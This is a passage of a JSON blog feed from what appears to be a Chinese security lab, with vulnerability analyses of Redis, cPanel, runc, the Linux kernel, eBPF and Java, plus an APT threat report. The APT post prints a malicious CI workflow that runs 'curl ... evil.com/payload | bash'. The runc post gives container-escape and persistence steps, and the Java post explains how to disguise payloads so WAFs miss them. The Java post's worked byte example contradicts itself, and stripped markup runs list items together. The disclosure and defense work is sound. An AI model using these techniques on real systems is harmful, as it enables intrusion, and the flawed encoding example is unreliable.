\nRedis 采用单线程事件循环模型处理所有客户端请求。当执行长时间阻塞的慢 Lua 函数时,Redis 内部的超时钩子(timeout hook)会周期性调用事件循环以处理外部 I/O 任务,防止服务器在脚本执行期间完全无响应。这一设计在保证响应性的同时,引入了并发语义的复杂性——Lua 脚本的执行上下文与外部事件处理共享同一线程。
\n漏洞的触发路径如下:
\nSLAVEOF 命令将目标 Redis 实例指定为外部恶意主节点的从节点FULLRESYNC 指令,该指令在事件循环中被强制处理FULLRESYNC 处理流程销毁并清空当前的全局 Lua 解释器环境(包括 Lua 虚拟机及堆栈结构)释放后使用原语使攻击者可在 Lua 虚拟机已销毁的内存区域上执行操作。通过操控已释放内存的内容(结合堆喷射技术),攻击者可劫持 Lua 虚拟机的函数调用链,绕过 Redis 的 Lua 沙箱限制,执行任意系统命令。该利用链无需依赖特定内存分配器行为,仅利用 Redis 单线程模型下的事件处理时序即可触发。
\n| 版本系列 | 受影响范围 | 修复版本 |
|---|---|---|
| Redis 7.2.x | 7.2.0 ≤ version < 7.2.14 | ≥ 7.2.14 |
| Redis 7.4.x | 7.4.0 ≤ version < 7.4.9 | ≥ 7.4.9 |
| Redis 8.2.x | 8.2.0 ≤ version < 8.2.6 | ≥ 8.2.6 |
| Redis 8.4.x | 8.4.0 ≤ version < 8.4.3 | ≥ 8.4.3 |
| Redis 8.6.x | 8.6.0 ≤ version < 8.6.3 | ≥ 8.6.3 |
两条利用链均需攻击者通过 Redis 认证并具备相应命令执行权限。CVE-2026-25243 需要 RESTORE 命令权限;CVE-2026-23631 需要 SLAVEOF 及 EVAL 命令权限,且目标实例能够连接至攻击者控制的恶意主节点。
Redis 官方已在各版本系列发布修复更新:
\n对于无法立即升级的环境,建议采取以下缓解措施:
\nrename-command 禁用 RESTORE 命令以阻断 CVE-2026-25243rename-command 禁用 SLAVEOF / REPLICAOF 命令以阻断 CVE-2026-23631 的触发路径requirepass 强密码认证并限制网络访问来源CVE-2026-25243 与 CVE-2026-23631 分别从反序列化解析一致性与单线程事件处理并发语义两个维度暴露了 Redis 的内存安全边界缺陷。前者的长度歧义问题反映了序列化格式演进中验证逻辑与转换逻辑的耦合风险,后者的 Lua 环境生命周期管理缺陷则揭示了单线程模型中事件处理时序的隐蔽竞态。两条利用链均需身份验证作为前置条件,但一旦满足,均可实现从内存破坏到远程代码执行的完整攻击链。官方补丁已发布,建议受影响用户尽快完成版本升级。
\n[1] NIST NVD. \"CVE-2026-25243: Redis RESTORE Double-Free Vulnerability.\" https://nvd.nist.gov/vuln/detail/CVE-2026-25243
\n[2] NIST NVD. \"CVE-2026-23631: Redis Master-Slave Sync Lua Engine Use-After-Free.\" https://nvd.nist.gov/vuln/detail/CVE-2026-23631
", "url": "https://www.ce.ac.cn/blog/redis-multiple-rce-analysis/", "title": "Redis 多条远程代码执行利用链分析(CVE-2026-25243 / CVE-2026-23631)", "summary": "针对 Redis RESTORE 双重释放漏洞(CVE-2026-25243)与主从同步 Lua 引擎释放后使用漏洞(CVE-2026-23631)的技术分析,涵盖内存破坏原语构造与沙箱逃逸路径。", "date_modified": "2026-05-05T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Disclosure", "Research" ] }, { "id": "https://www.ce.ac.cn/blog/cpanel-whm-vulnerability-analysis-cve-2026/", "content_html": "本报告针对cPanel & WHM主机控制面板近期披露的两批次高危安全漏洞(CVE-2026-2920x系列与CVE-2026-41940)进行分析。漏洞涉及认证绕过、任意文件读取、远程代码执行(RCE)及本地权限提升等多个攻击面,其组合利用可对服务器资产构成完整的控制链威胁。报告梳理了漏洞的技术细节、影响范围、关联的安全事件,并提出了相应的缓解与修复建议。
\n近期发现的高危漏洞主要分为两个关联的安全事件。
\ncPanel官方近期发布了针对三个新漏洞的安全更新:
\nCVE-2026-29201(CVSSv3评分:4.3)
\nfeature::LOADFEATUREFILE管理命令。CVE-2026-29202(CVSSv3评分:8.8)
\ncreate_user API接口的plugin参数。CVE-2026-29203(CVSSv3评分:8.8)
\nchmod操作存在缺陷。在以上漏洞披露之际,网络安全社区正面临另一个已被活跃利用的cPanel漏洞:
\n管理员应立即将cPanel & WHM系统升级至已修复的版本(11.136.0.9、11.134.0.25、11.132.0.31或更高版本)。
\n建议持续关注cPanel官方安全公告及CISA等权威安全机构的漏洞通报。
\ncPanel & WHM控制面板相继爆出的高危漏洞,特别是已观测到活跃利用的CVE-2026-41940认证绕过漏洞与新近披露的CVE-2026-2920x系列漏洞,构成了严峻的叠加风险。系统管理员需立即采取行动,应用安全更新、加强访问控制并部署检测机制,以缓解潜在的数据泄露、服务瘫痪乃至服务器完全被控的安全事件。
", "url": "https://www.ce.ac.cn/blog/cpanel-whm-vulnerability-analysis-cve-2026/", "title": "关于cPanel & WHM控制面板高危安全漏洞的分析报告", "summary": "针对cPanel & WHM主机控制面板CVE-2026-2920x系列与CVE-2026-41940高危漏洞的技术分析,涉及认证绕过、任意文件读取、远程代码执行等攻击面。", "date_modified": "2026-05-01T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Research" ] }, { "id": "https://www.ce.ac.cn/blog/cve-2026-race-condition-linux-kernel/", "content_html": "近期,Linux 内核子系统中发现一处高危竞态条件漏洞,影响 6.x 系列内核多个版本。攻击者可利用 io_uring 与文件系统操作之间的 TOCTOU 竞态,实现本地提权。
该漏洞编号为 CVE-2026-31431(CVSS 8.8),存在于 fs/io_uring.c 中 io_closeat 与 openat 的并发执行路径。当两个线程分别对同一文件描述符执行关闭和重命名操作时,内核未正确持锁保护 inode 引用计数,可导致 use-after-free 条件。
// 简化触发路径
Thread A: io_closeat(fd) → iput(inode) → inode 引用计数归零
Thread B: renameat2(...) → inode 重绑定 → 访问已释放的 inode
竞态窗口约 3-5ms,在多核环境下可稳定复现。研究团队通过自定义 Fuzzer 在 72 小时内检测到该漏洞。
\n上游补丁已提交至 stable@vger.kernel.org,通过在 io_closeat 路径中增加 inode_lock 实现互斥保护。
runc(Docker 和 Kubernetes 的底层容器运行时)近期披露一处文件描述符泄漏漏洞,攻击者可在特定条件下实现容器逃逸,获取宿主机 root 权限。
\nrunc 在处理 WORKDIR 指令时,错误地将宿主机文件描述符通过 /proc/self/fd 泄漏至容器命名空间内部。当容器镜像的 Dockerfile 包含特定 WORKDIR 路径构造时,可触发该路径。
1. 构造恶意 Dockerfile,WORKDIR 指向 /proc/self/fd/N
2. 构建镜像时 runc 未正确关闭继承的 fd
3. 容器启动后,进程可访问宿主机根文件系统
4. 写入 crontab 或 SSH 公钥实现持久化
| 组件 | 影响版本 | 修复版本 |
|---|---|---|
| runc | < 1.2.4 | 1.2.4 |
| Docker Engine | < 27.4.1 | 27.4.1 |
| containerd | < 1.7.24 | 1.7.24 |
| Kubernetes | 所有使用受影响 runc 的版本 | — |
restricted 策略/proc 文件系统挂载权限ICE 实验室将持续跟踪该漏洞的在野利用情况,并同步更新防御规则库。
", "url": "https://www.ce.ac.cn/blog/container-escape-runc-vulnerability/", "title": "runc 容器逃逸漏洞技术研判与防御建议", "summary": "runc(Docker 和 Kubernetes 的底层容器运行时)近期披露一处文件描述符泄漏漏洞,攻击者可在特定条件下实现容器逃逸,获取宿主机 root 权限。", "date_modified": "2026-04-15T00:00:00.000Z", "tags": [ "Container Security", "runc", "Kubernetes", "Escape" ] }, { "id": "https://www.ce.ac.cn/blog/apt-campaign-cloud-native/", "content_html": "2026 年 Q1 以来,多个 APT 组织显著加大了对云原生基础设施的攻击投入。ICE 实验室威胁情报团队通过长期追踪,识别出以下攻击趋势。
\n多个 APT 组织(包括 Lazarus、Volt Typhoon)开始将目标转向 Kubernetes API Server。主要攻击向量包括:
\n攻击者通过向 GitHub Actions / GitLab CI 配置文件注入恶意 workflow_dispatch 触发器,在构建阶段植入后门:
# 恶意 workflow 示例
on:
workflow_dispatch:
inputs:
deploy:
description: 'Deploy to production'
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- run: curl -sL https://evil.com/payload | bash
研究发现,针对 One-API、New-API 等 LLM 网关的攻击呈上升趋势:
\n| 类型 | 值 | 备注 |
|---|---|---|
| IP | 103.x.x.42 | C2 Server (APTX) |
| Domain | update-k8s-api[.]com | 钓鱼域名 |
| Hash | a3f8c...d2e1 | 恶意 Helm Chart SHA256 |
本报告基于 ICE 实验室 2026 Q1 威胁情报数据,完整 IoC 列表请通过内部渠道获取。
", "url": "https://www.ce.ac.cn/blog/apt-campaign-cloud-native/", "title": "APT 组织针对云原生基础设施的定向攻击活动分析", "summary": "2026 年 Q1 以来,多个 APT 组织显著加大了对云原生基础设施的攻击投入。ICE 实验室威胁情报团队通过长期追踪,识别出以下攻击趋势。", "date_modified": "2026-04-08T00:00:00.000Z", "tags": [ "APT", "Threat Intelligence", "Kubernetes", "Supply Chain" ] }, { "id": "https://www.ce.ac.cn/blog/ebpf-security-boundary-research/", "content_html": "eBPF 技术在近年来从内核可观测性工具迅速演变为安全防御与攻击的双刃剑。ICE 实验室近期完成了对 eBPF 子系统安全边界的系统性研究,以下为核心发现。
\n| 攻击类型 | 描述 | 防御机制 |
|---|---|---|
| Verifier 绕过 | 构造复杂控制流逃逸验证器 | 程序复杂度限制 |
| Helper 滥用 | 利用合法 Helper 实现非预期操作 | Helper 白名单 |
| Map 操纵 | 通过共享 Map 实现跨程序数据注入 | Map 权限检查 |
Speculative eBPF Execution
\neBPF-to-XDP 转发链污染
\nBPF Timer 侧信道
\nbpf_timer 的高精度计时能力提取内核地址空间布局在对 50+ 个主流 eBPF 安全工具(Falco、Tetragon、Tracee 等)的审计中,我们发现:
\nCAP_BPF 权限范围1. 严格限制 CAP_BPF 和 CAP_PERFMON 的授予范围
2. 启用 BPF 链签名验证(bpf_link_create 路径)
3. 部署 eBPF 程序白名单机制
4. 定期审计 eBPF Map 的跨进程共享权限
本研究成果已整理为技术报告,将在后续安全会议上公开发布。
", "url": "https://www.ce.ac.cn/blog/ebpf-security-boundary-research/", "title": "eBPF 安全边界研究:从内核可观测性到攻击面扩展", "summary": "eBPF 技术在近年来从内核可观测性工具迅速演变为安全防御与攻击的双刃剑。ICE 实验室近期完成了对 eBPF 子系统安全边界的系统性研究,以下为核心发现。", "date_modified": "2026-03-28T00:00:00.000Z", "tags": [ "eBPF", "Kernel Security", "Research" ] }, { "id": "https://www.ce.ac.cn/blog/zero-day-linux-kernel-cve-2026-1097/", "content_html": "CVE-2026-1097(CVSS 9.8 Critical)是 ICE 实验室在对 Linux 内核 Netfilter 子系统进行 Fuzzing 测试时发现的一个零日漏洞,已于 2026 年 3 月通过负责任披露流程通知维护者。
\n漏洞类型:堆溢出(Heap Overflow)\n影响组件:net/netfilter/nf_tables_api.c\n影响版本:Linux Kernel 5.15 - 6.12
当用户空间通过 nf_tables API 执行以下操作序列时,可触发堆溢出:
NFTA_SET_USERDATA 的规则集合NFT_MSG_NEWRULE 和 NFT_MSG_DELRULEnft_setelem_catchall 处理路径中,dlen 未正确校验导致越界写入| 日期 | 事件 |
|---|---|
| 2026-02-12 | ICE 实验室 Fuzzer 检测到异常 crash |
| 2026-02-18 | 确认为可利用漏洞,启动负责任披露 |
| 2026-02-25 | 通知 Linux Kernel Security Team |
| 2026-03-05 | 上游补丁合入 stable 分支 |
| 2026-03-10 | CVE-2026-1097 正式分配 |
| 2026-03-15 | 公开披露 |
// 修复:增加 dlen 校验
+ if (dlen > NFT_USERDATA_MAXLEN)
+ return -EINVAL;
kdata = kmalloc(dlen, GFP_KERNEL);
修复方案简洁有效,核心是在 nft_user_data_copy 入口处增加长度边界检查,阻止超长 userdata 写入。
ICE 实验室将持续监控 Netfilter 子系统的安全状态,并计划发布针对 nf_tables 的专项 Fuzzing 工具集。
本文综述了在2026年4月Black Hat Asia安全大会上首次被系统披露的一种新型、系统性的Java生态安全威胁。该威胁源于Java编程语言中char(16位)类型向byte(8位)类型转换时,高位字节(即“幽灵比特位”)被静默丢弃的底层编码缺陷。攻击者可利用此缺陷构造特制的Unicode载荷,使其在Web应用防火墙等前端安全设备的检测中表现为无意义字符序列,而在目标Java后端解码时,该载荷通过高位截断被还原为原始攻击指令,从而有效绕过基于字符串特征匹配的安全检测,最终触发包括SQL注入、远程代码执行、文件上传、SMTP注入等多种高危攻击链。
Java语言规范中,char类型用于表示Unicode字符,占用16位存储空间,而byte类型仅占8位。在涉及(byte)ch、ch & 0xFF、ByteArrayOutputStream.write(ch)、DataOutputStream.writeBytes()等常见转换操作时,系统会丢弃char值的高8位,仅保留低8位。例如,汉字“爻”(Unicode码点U+2F58,二进制00101111 01011000)在经(byte)转换后,高8位0x2F被丢弃,仅保留低8位0x3A,其ASCII对应字符为:。此机制意味着,任何ASCII字符均可被其低8位与之相同的特定Unicode字符所“伪装”。
攻击模型为:攻击者将传统攻击载荷(如../etc/passwd)中的关键ASCII字符替换为上述“伪装”Unicode字符。当前端WAF/IDS对原始请求进行字符串匹配检测时,由于字符编码不同,无法识别威胁特征。当该请求被后端Java应用接收并处理时,在路径解析、参数解码、序列化、文件名处理等涉及char到byte转换的环节,幽灵比特位被丢弃,载荷被还原为原始攻击指令,从而成功执行。
此缺陷在Java生态中广泛存在。据研究统计,在GitHub代码仓库中,存在此类风险写法的项目超过8,100个。其直接影响覆盖了主流的框架与中间件,包括但不限于:
\n.jsp Webshell)的上传绕过。更严重的是,该技术可被用于绕过针对多个已公开高危漏洞(如GeoServer CVE-2024-36401、Spring Framework CVE-2022-22965)的现有WAF防护规则,使得相关系统在已部署安全设备的情况下依然暴露于远程代码执行风险之中。
\n针对此系统性风险,建议采取多层次防御措施:
\n(byte)ch、ch & 0xFF等危险转换。应明确指定字符集,使用String.getBytes(StandardCharsets.UTF_8)等方法。“幽灵比特位”攻击揭示了Java生态中长期被忽视的一个底层编码隐患,其利用方式优雅且高效,对现有以特征匹配为核心的安全防护体系构成了严峻挑战。该缺陷的普遍性意味着大量Java应用面临潜在风险。修复此问题不仅需要依赖厂商的补丁,更需要开发者在编码实践中建立正确的字符集处理意识,以及安全团队在防御体系中部署能够理解编码语义的深层检测机制。
", "url": "https://www.ce.ac.cn/blog/java-charset-ghost-bit-waf-bypass/", "title": "基于Java字符编码“幽灵比特位”的安全威胁:一种新型WAF绕过机制的发现与分析", "summary": "系统性披露 Java 生态中 char 到 byte 转换导致高位字节静默丢弃的编码缺陷,攻击者可构造 Unicode 载荷绕过 WAF 检测。", "date_modified": "2026-02-01T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Research" ] } ] }